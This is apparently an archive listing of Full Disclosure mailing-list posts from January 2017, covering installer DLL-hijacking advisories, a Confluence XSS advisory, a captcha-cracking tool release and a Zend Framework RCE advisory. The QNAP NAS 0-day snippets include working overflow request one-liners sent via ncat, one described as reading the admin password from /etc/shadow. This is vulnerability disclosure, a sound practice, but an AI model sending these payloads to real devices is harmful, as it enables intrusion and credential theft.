[FD] Executable installers are vulnerable^WEVIL (case 45): ReadPDF's installers allow escalation of privilege

2017-01-03 Thread Stefan Kanthak
Hi @ll, the executable installer "InstallTinyPDF.exe", available from , is (surprise.-) vulnerable: 1. DLL hijacking (this is well-known and well-documented; see ,

[FD] Executable installers are vulnerable^WEVIL (case 43): SoftMaker's Office service pack installers allow escalation of privilege

2017-01-03 Thread Stefan Kanthak
Hi @ll, the service pack installers for SoftMaker Office 201x, available from , are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zS\" to extract

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

2017-01-03 Thread bashis
Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56) [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | gr

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

2017-01-03 Thread bashis
And also; == [Stack overflow] == [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 192.168.5.7 443 HTTP/1.1 200 OK Date: Mon, 02 Jan 2017 11:59:24 GMT

[FD] 0-day: QNAP NAS Devices suffer of heap overflow

2017-01-03 Thread bashis
Greetings, Twice I tried to use the QNAP Web page (https://aid.qnap.com/event/_module/nas/safe_report/) for reporting vulnerability, and twice I got mailer-daemon back. So, I’ll post my vulnerabilities here instead (Was not meant to be 0-day… whatever). Have a nice day (and happy new year) /b

[FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

2017-01-03 Thread jlss
=[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]== Persisted Cross-Site Scripting (XSS) in Confluence Jira Software Author(s): - Jodson Santos - jodson.san...@tempest.com.br Temp

[FD] Advisories Unsafe Dll in Audacity, telegram and Akamai

2017-01-03 Thread filipe
=[ Tempest Security Intelligence - ADV-7/2016 ]= Unsafe DLL search path in Audacity 2.1.2 Author: Felipe Xavier Oliveira < engfilipeoliveira89 () gmail.com > Tempest Security Intelligence - Recife, Pernambuco - Brazil =[ Table of Contents ]===

[FD] CINtruder v0.3 released...

2017-01-03 Thread psy
Dear list, I have released a new Captcha Intruder (CINtruder) code. It includes a complete Web User Interface (GUI) and some advanced features for: update, manage dictionaries, etc. http://cintruder.03c8.net If you're not already familiar with CINtruder, please read the DESCRIPTION section below

[FD] Zend Framework / zend-mail < 2.4.11 Remote Code Execution (CVE-2016-10034)

2017-01-03 Thread Dawid Golunski
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.7.2 Discovered by Dawid Golunski (@dawid_golunski) https://legalhackers.com Desc: An independent research uncovered a critical vulnerability in zend-mail, a Zend Framework's component that could potentially be used by